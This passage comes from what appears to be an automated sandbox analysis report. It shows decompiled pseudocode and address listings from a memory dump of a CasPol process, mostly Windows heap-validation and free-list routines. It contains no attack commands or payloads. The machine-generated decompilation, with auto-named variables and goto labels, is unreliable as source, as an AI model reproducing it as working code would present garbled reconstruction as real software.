                                                                										_t263 = _t289 & 0x0000ffff;
                                                                										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                                										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                                											break;
                                                                										}
                                                                										_t289 = _t289 + 1;
                                                                										__eflags = _t289 - 0x81;
                                                                										if(_t289 < 0x81) {
                                                                											continue;
                                                                										}
                                                                										goto L77;
                                                                									}
                                                                									_t203 =  *[fs:0x30];
                                                                									__eflags =  *(_t203 + 0xc);
                                                                									if( *(_t203 + 0xc) == 0) {
                                                                										_push("HEAP: ");
                                                                										E0162B150();
                                                                									} else {
                                                                										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                									}
                                                                									_t291 = _v12;
                                                                									_push(_t291 + _t263 * 4);
                                                                									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                                									_push( *((intOrPtr*)(_t329 + 8)));
                                                                									E0162B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                                									goto L59;
                                                                								}
                                                                								_t212 =  *[fs:0x30];
                                                                								__eflags =  *(_t212 + 0xc);
                                                                								if( *(_t212 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                								}
                                                                								_push(_t331[0x1d]);
                                                                								_push(_v36);
                                                                								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                                								L58:
                                                                								E0162B150();
                                                                								goto L59;
                                                                							}
                                                                							_t220 =  *[fs:0x30];
                                                                							__eflags =  *(_t220 + 0xc);
                                                                							if( *(_t220 + 0xc) == 0) {
                                                                								_push("HEAP: ");
                                                                								E0162B150();
                                                                							} else {
                                                                								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                							}
                                                                							_push(_t328);
                                                                							_push(_v24);
                                                                							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                                							goto L58;
                                                                						} else {
                                                                							goto L50;
                                                                						}
                                                                						while(1) {
                                                                							L50:
                                                                							_t92 = _t327 - 0x10; // -24
                                                                							_t282 = _t331;
                                                                							_t230 = E016E4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                                							__eflags = _t230;
                                                                							if(_t230 == 0) {
                                                                								goto L59;
                                                                							}
                                                                							_t327 =  *_t327;
                                                                							__eflags = _t327 - _t261;
                                                                							if(_t327 != _t261) {
                                                                								continue;
                                                                							}
                                                                							_t184 = _v24;
                                                                							_t282 = _v36;
                                                                							goto L53;
                                                                						}
                                                                						goto L59;
                                                                					} else {
                                                                						while(1) {
                                                                							_t39 = _t326 + 0x18; // 0x10
                                                                							_t264 = _t39;
                                                                							if(_t331[0x13] != 0) {
                                                                								_t319 = _t331[0x14] ^  *_t264;
                                                                								 *_t264 = _t319;
                                                                								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                                								_t348 = _t319 >> 0x18 - _t303;
                                                                								if(_t319 >> 0x18 != _t303) {
                                                                									_push(_t303);
                                                                									E016DFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                                								}
                                                                								_t281 = 0x81;
                                                                							}
                                                                							_t317 = _v20;
                                                                							if(_t317 != 0) {
                                                                								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                                								_t350 = _t241;
                                                                								if(_t350 != 0) {
                                                                									if(_t350 >= 0) {
                                                                										__eflags = _t241 & 0x00000800;
                                                                										if(__eflags == 0) {
                                                                											__eflags = _t241 - _t331[0x21];
                                                                											if(__eflags < 0) {
                                                                												_t298 = _t241;
                                                                												_t65 = _t317 + _t298 * 4;
                                                                												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                                												__eflags =  *_t65;
                                                                											}
                                                                										}
                                                                									} else {
                                                                										_t244 = _t241 & 0x00007fff;
                                                                										if(_t244 < _t281) {
                                                                											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E016D23E3(_t331, _t264) == 0) {
                                                                								break;
                                                                							}
                                                                							if(_t331[0x13] != 0) {
                                                                								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                                								 *_t264 =  *_t264 ^ _t331[0x14];
                                                                							}
                                                                							_t326 =  *_t326;
                                                                							if( &(_t331[0x27]) == _t326) {
                                                                								goto L49;
                                                                							} else {
                                                                								_t281 = 0x81;
                                                                								continue;
                                                                							}
                                                                						}
                                                                						__eflags = _t331[0x13];
                                                                						if(_t331[0x13] != 0) {
                                                                							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                                							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                                						}
                                                                						goto L65;
                                                                					}
                                                                				} else {
                                                                					L83:
                                                                					return _t267;
                                                                				}
                                                                			}

                                                                0x00000000
                                                                0x016e48f3
                                                                0x016e487f
                                                                0x016e4885
                                                                0x016e4887
                                                                0x016e48a8
                                                                0x016e48a8
                                                                0x016e48ae
                                                                0x016e48b0
                                                                0x016e48dc
                                                                0x016e48dc
                                                                0x016e48dc
                                                                0x016e48dc
                                                                0x016e48ec
                                                                0x00000000
                                                                0x016e48ec
                                                                0x016e48b2
                                                                0x016e48bc
                                                                0x016e48be
                                                                0x016e48c1
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48c3
                                                                0x016e48c3
                                                                0x016e48c6
                                                                0x016e48c9
                                                                0x016e48cc
                                                                0x016e48d1
                                                                0x016e48d4
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48d6
                                                                0x016e48d7
                                                                0x016e48da
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48da
                                                                0x016e494f
                                                                0x016e4955
                                                                0x016e4959
                                                                0x016e4978
                                                                0x016e497d
                                                                0x016e495b
                                                                0x016e4970
                                                                0x016e4975
                                                                0x016e4986
                                                                0x016e4987
                                                                0x016e498a
                                                                0x016e498d
                                                                0x016e4997
                                                                0x016e47ef
                                                                0x016e47ef
                                                                0x016e47ef
                                                                0x00000000
                                                                0x016e47ef
                                                                0x016e4890
                                                                0x016e4890
                                                                0x016e4891
                                                                0x016e4891
                                                                0x016e4894
                                                                0x016e4897
                                                                0x016e489d
                                                                0x016e48a0
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48a2
                                                                0x016e48a3
                                                                0x016e48a6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48a6
                                                                0x016e48fb
                                                                0x016e4901
                                                                0x016e4905
                                                                0x016e4924
                                                                0x016e4929
                                                                0x016e4907
                                                                0x016e491c
                                                                0x016e4921
                                                                0x016e492f
                                                                0x016e4935
                                                                0x016e4936
                                                                0x016e4939
                                                                0x016e4942
                                                                0x00000000
                                                                0x016e4947
                                                                0x016e4835
                                                                0x016e483b
                                                                0x016e483f
                                                                0x016e485e
                                                                0x016e4863
                                                                0x016e4841
                                                                0x016e4856
                                                                0x016e485b
                                                                0x016e4869
                                                                0x016e486c
                                                                0x016e486f
                                                                0x016e47e7
                                                                0x016e47e7
                                                                0x00000000
                                                                0x016e47ec
                                                                0x016e47aa
                                                                0x016e47b0
                                                                0x016e47b4
                                                                0x016e47d3
                                                                0x016e47d8
                                                                0x016e47b6
                                                                0x016e47cb
                                                                0x016e47d0
                                                                0x016e47de
                                                                0x016e47df
                                                                0x016e47e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e476f
                                                                0x016e476f
                                                                0x016e4778
                                                                0x016e4785
                                                                0x016e4787
                                                                0x016e478c
                                                                0x016e478e
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4790
                                                                0x016e4792
                                                                0x016e4794
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4796
                                                                0x016e4799
                                                                0x00000000
                                                                0x016e4799
                                                                0x00000000
                                                                0x016e45c3
                                                                0x016e45c3
                                                                0x016e45c7
                                                                0x016e45c7
                                                                0x016e45ca
                                                                0x016e45cf
                                                                0x016e45d3
                                                                0x016e45df
                                                                0x016e45e4
                                                                0x016e45e6
                                                                0x016e45e8
                                                                0x016e45ed
                                                                0x016e45ed
                                                                0x016e45f2
                                                                0x016e45f2
                                                                0x016e45f7
                                                                0x016e45fc
                                                                0x016e4602
                                                                0x016e4606
                                                                0x016e4609
                                                                0x016e460f
                                                                0x016e46de
                                                                0x016e46e3
                                                                0x016e46e5
                                                                0x016e46ec
                                                                0x016e46ee
                                                                0x016e46f6
                                                                0x016e46f6
                                                                0x016e46f6
                                                                0x016e46f6
                                                                0x016e46ec
                                                                0x016e4615
                                                                0x016e4615
                                                                0x016e461d
                                                                0x016e462e
                                                                0x016e462e
                                                                0x016e461d
                                                                0x016e460f
                                                                0x016e4609
                                                                0x016e46fd
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4710
                                                                0x016e471a
                                                                0x016e4720
                                                                0x016e4720
                                                                0x016e4722
                                                                0x016e472c
                                                                0x00000000
                                                                0x016e472e
                                                                0x016e472e
                                                                0x00000000
                                                                0x016e472e
                                                                0x016e472c
                                                                0x016e4738
                                                                0x016e473c
                                                                0x016e474b
                                                                0x016e4751
                                                                0x016e4751
                                                                0x00000000
                                                                0x016e473c
                                                                0x016e48f4
                                                                0x016e48f4
                                                                0x00000000
                                                                0x016e48f4

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                • API String ID: 0-1357697941
                                                                • Opcode ID: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                                                                • Instruction ID: c354e8cf366179c4ed64f68c740f97c33cbeb53464c89a0f30de9b13ac8f0e82
                                                                • Opcode Fuzzy Hash: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                                                                • Instruction Fuzzy Hash: 40F10E31602656DFDB25CFA9C888BAABBF2FF05300F198259E546D7641CB30A985CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 72%
                                                                			E0164A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                                				char _v8;
                                                                				signed short _v12;
                                                                				signed short _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed short _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				signed int _v40;
                                                                				signed int _v44;
                                                                				signed int _v48;
                                                                				unsigned int _v52;
                                                                				signed int _v56;
                                                                				void* _v60;
                                                                				intOrPtr _v64;
                                                                				void* _v72;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __ebp;
                                                                				unsigned int _t246;
                                                                				signed char _t247;
                                                                				signed short _t249;
                                                                				unsigned int _t256;
                                                                				signed int _t262;
                                                                				signed int _t265;
                                                                				signed int _t266;
                                                                				signed int _t267;
                                                                				intOrPtr _t270;
                                                                				signed int _t280;
                                                                				signed int _t286;
                                                                				signed int _t289;
                                                                				intOrPtr _t290;
                                                                				signed int _t291;
                                                                				signed int _t317;
                                                                				signed short _t320;
                                                                				intOrPtr _t327;
                                                                				signed int _t339;
                                                                				signed int _t344;
                                                                				signed int _t347;
                                                                				intOrPtr _t348;
                                                                				signed int _t350;
                                                                				signed int _t352;
                                                                				signed int _t353;
                                                                				signed int _t356;
                                                                				intOrPtr _t357;
                                                                				intOrPtr _t366;
                                                                				signed int _t367;
                                                                				signed int _t370;
                                                                				intOrPtr _t371;
                                                                				signed int _t372;
                                                                				signed int _t394;
                                                                				signed short _t402;
                                                                				intOrPtr _t404;
                                                                				intOrPtr _t415;
                                                                				signed int _t430;
                                                                				signed int _t433;
                                                                				signed int _t437;
                                                                				signed int _t445;
                                                                				signed short _t446;
                                                                				signed short _t449;
                                                                				signed short _t452;
                                                                				signed int _t455;
                                                                				signed int _t460;
                                                                				signed short* _t468;
                                                                				signed int _t480;
                                                                				signed int _t481;
                                                                				signed int _t483;
                                                                				intOrPtr _t484;
                                                                				signed int _t491;
                                                                				unsigned int _t506;
                                                                				unsigned int _t508;
                                                                				signed int _t513;
                                                                				signed int _t514;
                                                                				signed int _t521;
                                                                				signed short* _t533;
                                                                				signed int _t541;
                                                                				signed int _t543;
                                                                				signed int _t546;
                                                                				unsigned int _t551;
                                                                				signed int _t553;
                                                                
                                                                				_t450 = __ecx;
                                                                				_t553 = __ecx;
                                                                				_t539 = __edx;
                                                                				_v28 = 0;
                                                                				_v40 = 0;
                                                                				if(( *(__ecx + 0xcc) ^  *0x1718a68) != 0) {
                                                                					_push(_a4);
                                                                					_t513 = __edx;
                                                                					L11:
                                                                					_t246 = E0164A830(_t450, _t513);
                                                                					L7:
                                                                					return _t246;
                                                                				}
                                                                				if(_a8 != 0) {
                                                                					__eflags =  *(__edx + 2) & 0x00000008;
                                                                					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                                						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                                						_t430 = E0164DF24(__edx,  &_v12,  &_v16);
                                                                						__eflags = _t430;
                                                                						if(_t430 != 0) {
                                                                							_t157 = _t553 + 0x234;
                                                                							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                                							__eflags =  *_t157;
                                                                						}
                                                                					}
                                                                					_t445 = _a4;
                                                                					_t514 = _t539;
                                                                					_v48 = _t539;
                                                                					L14:
                                                                					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                                					__eflags = _t247;
                                                                					if(_t247 == 0) {
                                                                						_t541 = _t553;
                                                                					} else {
                                                                						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                                						__eflags = _t541;
                                                                					}
                                                                					_t249 = 7 + _t445 * 8 + _t514;
                                                                					_v12 = _t249;
                                                                					__eflags =  *_t249 - 3;
                                                                					if( *_t249 == 3) {
                                                                						_v16 = _t514 + _t445 * 8 + 8;
                                                                						E01629373(_t553, _t514 + _t445 * 8 + 8);
                                                                						_t452 = _v16;
                                                                						_v28 =  *(_t452 + 0x10);
                                                                						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                                						_v36 =  *(_t452 + 0x14);
                                                                						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                                						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                                                						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                                						_t256 =  *(_t452 + 0x14);
                                                                						__eflags = _t256 - 0x7f000;
                                                                						if(_t256 >= 0x7f000) {
                                                                							_t142 = _t553 + 0x1ec;
                                                                							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                                							__eflags =  *_t142;
                                                                							_t256 =  *(_t452 + 0x14);
                                                                						}
                                                                						_t513 = _v48;
                                                                						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                                						_a4 = _t445;
                                                                						_v40 = 1;
                                                                					} else {
                                                                						_t27 =  &_v36;
                                                                						 *_t27 = _v36 & 0x00000000;
                                                                						__eflags =  *_t27;
                                                                					}
                                                                					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                                					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                                						_v44 = _t513;
                                                                						_t262 = E0162A9EF(_t541, _t513);
                                                                						__eflags = _a8;
                                                                						_v32 = _t262;
                                                                						if(_a8 != 0) {
                                                                							__eflags = _t262;
                                                                							if(_t262 == 0) {
                                                                								goto L19;
                                                                							}
                                                                						}
                                                                						__eflags =  *0x1718748 - 1;
                                                                						if( *0x1718748 >= 1) {
                                                                							__eflags = _t262;
                                                                							if(_t262 == 0) {
                                                                								_t415 =  *[fs:0x30];
                                                                								__eflags =  *(_t415 + 0xc);
                                                                								if( *(_t415 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                								}
                                                                								_push("(UCRBlock != NULL)");
                                                                								E0162B150();
                                                                								__eflags =  *0x1717bc8;
                                                                								if( *0x1717bc8 == 0) {
                                                                									__eflags = 1;
                                                                									E016E2073(_t445, 1, _t541, 1);
                                                                								}
                                                                								_t513 = _v48;
                                                                								_t445 = _a4;
                                                                							}
                                                                						}
                                                                						_t350 = _v40;
                                                                						_t480 = _t445 << 3;
                                                                						_v20 = _t480;
                                                                						_t481 = _t480 + _t513;
                                                                						_v24 = _t481;
                                                                						__eflags = _t350;
                                                                						if(_t350 == 0) {
                                                                							_t481 = _t481 + 0xfffffff0;
                                                                							__eflags = _t481;
                                                                						}
                                                                						_t483 = (_t481 & 0xfffff000) - _v44;
                                                                						__eflags = _t483;
                                                                						_v52 = _t483;
                                                                						if(_t483 == 0) {
                                                                							__eflags =  *0x1718748 - 1;
                                                                							if( *0x1718748 < 1) {
                                                                								goto L9;
                                                                							}
                                                                							__eflags = _t350;
                                                                							goto L146;
                                                                						} else {
                                                                							_t352 = E0165174B( &_v44,  &_v52, 0x4000);
                                                                							__eflags = _t352;
                                                                							if(_t352 < 0) {
                                                                								goto L94;
                                                                							}
                                                                							_t353 = E01647D50();
                                                                							_t447 = 0x7ffe0380;
                                                                							__eflags = _t353;
                                                                							if(_t353 != 0) {
                                                                								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                							} else {
                                                                								_t356 = 0x7ffe0380;
                                                                							}
                                                                							__eflags =  *_t356;
                                                                							if( *_t356 != 0) {
                                                                								_t357 =  *[fs:0x30];
                                                                								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                                								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                                									E016E14FB(_t447, _t553, _v44, _v52, 5);
                                                                								}
                                                                							}
                                                                							_t358 = _v32;
                                                                							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                                							__eflags = _t484 - 0x7f000;
                                                                							if(_t484 >= 0x7f000) {
                                                                								_t90 = _t553 + 0x1ec;
                                                                								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                                								__eflags =  *_t90;
                                                                							}
                                                                							E01629373(_t553, _t358);
                                                                							_t486 = _v32;
                                                                							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                                							E01629819(_t486);
                                                                							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                                							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                                							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                                							__eflags = _t366 - 0x7f000;
                                                                							if(_t366 >= 0x7f000) {
                                                                								_t104 = _t553 + 0x1ec;
                                                                								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                                								__eflags =  *_t104;
                                                                							}
                                                                							__eflags = _v40;
                                                                							if(_v40 == 0) {
                                                                								_t533 = _v52 + _v44;
                                                                								_v32 = _t533;
                                                                								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                								__eflags = _v24 - _v52 + _v44;
                                                                								if(_v24 == _v52 + _v44) {
                                                                									__eflags =  *(_t553 + 0x4c);
                                                                									if( *(_t553 + 0x4c) != 0) {
                                                                										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                                										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                                									}
                                                                								} else {
                                                                									_t449 = 0;
                                                                									_t533[3] = 0;
                                                                									_t533[1] = 0;
                                                                									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                                									_t491 = _t394;
                                                                									 *_t533 = _t394;
                                                                									__eflags =  *0x1718748 - 1; // 0x0
                                                                									if(__eflags >= 0) {
                                                                										__eflags = _t491 - 1;
                                                                										if(_t491 <= 1) {
                                                                											_t404 =  *[fs:0x30];
                                                                											__eflags =  *(_t404 + 0xc);
                                                                											if( *(_t404 + 0xc) == 0) {
                                                                												_push("HEAP: ");
                                                                												E0162B150();
                                                                											} else {
                                                                												E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                											}
                                                                											_push("((LONG)FreeEntry->Size > 1)");
                                                                											E0162B150();
                                                                											_pop(_t491);
                                                                											__eflags =  *0x1717bc8 - _t449; // 0x0
                                                                											if(__eflags == 0) {
                                                                												__eflags = 0;
                                                                												_t491 = 1;
                                                                												E016E2073(_t449, 1, _t541, 0);
                                                                											}
                                                                											_t533 = _v32;
                                                                										}
                                                                									}
                                                                									_t533[1] = _t449;
                                                                									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                                										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                                										_v16 = _t402;
                                                                										__eflags = _t402 - 0xfe;
                                                                										if(_t402 >= 0xfe) {
                                                                											_push(_t491);
                                                                											_push(_t449);
                                                                											E016EA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                                											_t533 = _v48;
                                                                											_t402 = _v32;
                                                                										}
                                                                										_t449 = _t402;
                                                                									}
                                                                									_t533[3] = _t449;
                                                                									E0164A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                                									_t447 = 0x7ffe0380;
                                                                								}
                                                                							}
                                                                							_t367 = E01647D50();
                                                                							__eflags = _t367;
                                                                							if(_t367 != 0) {
                                                                								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                							} else {
                                                                								_t370 = _t447;
                                                                							}
                                                                							__eflags =  *_t370;
                                                                							if( *_t370 != 0) {
                                                                								_t371 =  *[fs:0x30];
                                                                								__eflags =  *(_t371 + 0x240) & 1;
                                                                								if(( *(_t371 + 0x240) & 1) != 0) {
                                                                									__eflags = E01647D50();
                                                                									if(__eflags != 0) {
                                                                										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                									}
                                                                									E016E1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                                								}
                                                                							}
                                                                							_t372 = E01647D50();
                                                                							_t546 = 0x7ffe038a;
                                                                							_t446 = 0x230;
                                                                							__eflags = _t372;
                                                                							if(_t372 != 0) {
                                                                								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                							} else {
                                                                								_t246 = 0x7ffe038a;
                                                                							}
                                                                							__eflags =  *_t246;
                                                                							if( *_t246 == 0) {
                                                                								goto L7;
                                                                							} else {
                                                                								__eflags = E01647D50();
                                                                								if(__eflags != 0) {
                                                                									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                                									__eflags = _t546;
                                                                								}
                                                                								_push( *_t546 & 0x000000ff);
                                                                								_push(_v36);
                                                                								_push(_v40);
                                                                								goto L120;
                                                                							}
                                                                						}
                                                                					} else {
                                                                						L19:
                                                                						_t31 = _t513 + 0x101f; // 0x101f
                                                                						_t455 = _t31 & 0xfffff000;
                                                                						_t32 = _t513 + 0x28; // 0x28
                                                                						_v44 = _t455;
                                                                						__eflags = _t455 - _t32;
                                                                						if(_t455 == _t32) {
                                                                							_t455 = _t455 + 0x1000;
                                                                							_v44 = _t455;
                                                                						}
                                                                						_t265 = _t445 << 3;
                                                                						_v24 = _t265;
                                                                						_t266 = _t265 + _t513;
                                                                						__eflags = _v40;
                                                                						_v20 = _t266;
                                                                						if(_v40 == 0) {
                                                                							_t266 = _t266 + 0xfffffff0;
                                                                							__eflags = _t266;
                                                                						}
                                                                						_t267 = _t266 & 0xfffff000;
                                                                						_v52 = _t267;
                                                                						__eflags = _t267 - _t455;
                                                                						if(_t267 < _t455) {
                                                                							__eflags =  *0x1718748 - 1; // 0x0
                                                                							if(__eflags < 0) {
                                                                								L9:
                                                                								_t450 = _t553;
                                                                								L10:
                                                                								_push(_t445);
                                                                								goto L11;
                                                                							}
                                                                							__eflags = _v40;
                                                                							L146:
                                                                							if(__eflags == 0) {
                                                                								goto L9;
                                                                							}
                                                                							_t270 =  *[fs:0x30];
                                                                							__eflags =  *(_t270 + 0xc);
                                                                							if( *(_t270 + 0xc) == 0) {
                                                                								_push("HEAP: ");
                                                                								E0162B150();
                                                                							} else {
                                                                								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                							}
                                                                							_push("(!TrailingUCR)");
                                                                							E0162B150();
                                                                							__eflags =  *0x1717bc8;
                                                                							if( *0x1717bc8 == 0) {
                                                                								__eflags = 0;
                                                                								E016E2073(_t445, 1, _t541, 0);
                                                                							}
                                                                							L152:
                                                                							_t445 = _a4;
                                                                							L153:
                                                                							_t513 = _v48;
                                                                							goto L9;
                                                                						}
                                                                						_v32 = _t267;
                                                                						_t280 = _t267 - _t455;
                                                                						_v32 = _v32 - _t455;
                                                                						__eflags = _a8;
                                                                						_t460 = _v32;
                                                                						_v52 = _t460;
                                                                						if(_a8 != 0) {
                                                                							L27:
                                                                							__eflags = _t280;
                                                                							if(_t280 == 0) {
                                                                								L33:
                                                                								_t446 = 0;
                                                                								__eflags = _v40;
                                                                								if(_v40 == 0) {
                                                                									_t468 = _v44 + _v52;
                                                                									_v36 = _t468;
                                                                									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                									__eflags = _v20 - _v52 + _v44;
                                                                									if(_v20 == _v52 + _v44) {
                                                                										__eflags =  *(_t553 + 0x4c);
                                                                										if( *(_t553 + 0x4c) != 0) {
                                                                											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                                											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                                										}
                                                                									} else {
                                                                										_t468[3] = 0;
                                                                										_t468[1] = 0;
                                                                										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                                										_t521 = _t317;
                                                                										 *_t468 = _t317;
                                                                										__eflags =  *0x1718748 - 1; // 0x0
                                                                										if(__eflags >= 0) {
                                                                											__eflags = _t521 - 1;
                                                                											if(_t521 <= 1) {
                                                                												_t327 =  *[fs:0x30];
                                                                												__eflags =  *(_t327 + 0xc);
                                                                												if( *(_t327 + 0xc) == 0) {
                                                                													_push("HEAP: ");
                                                                													E0162B150();
                                                                												} else {
                                                                													E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                												}
                                                                												_push("(LONG)FreeEntry->Size > 1");
                                                                												E0162B150();
                                                                												__eflags =  *0x1717bc8 - _t446; // 0x0
                                                                												if(__eflags == 0) {
                                                                													__eflags = 1;
                                                                													E016E2073(_t446, 1, _t541, 1);
                                                                												}
                                                                												_t468 = _v36;
                                                                											}
                                                                										}
                                                                										_t468[1] = _t446;
                                                                										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                                										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                                											_t320 = _t446;
                                                                										} else {
                                                                											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                                											_v12 = _t320;
                                                                											__eflags = _t320 - 0xfe;
                                                                											if(_t320 >= 0xfe) {
                                                                												_push(_t468);
                                                                												_push(_t446);
                                                                												E016EA80D(_t522, 3, _t468, _t541);
                                                                												_t468 = _v52;
                                                                												_t320 = _v28;
                                                                											}
                                                                										}
                                                                										_t468[3] = _t320;
                                                                										E0164A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                                									}
                                                                								}
                                                                								E0164B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                                								E0164A830(_t553, _v64, _v24);
                                                                								_t286 = E01647D50();
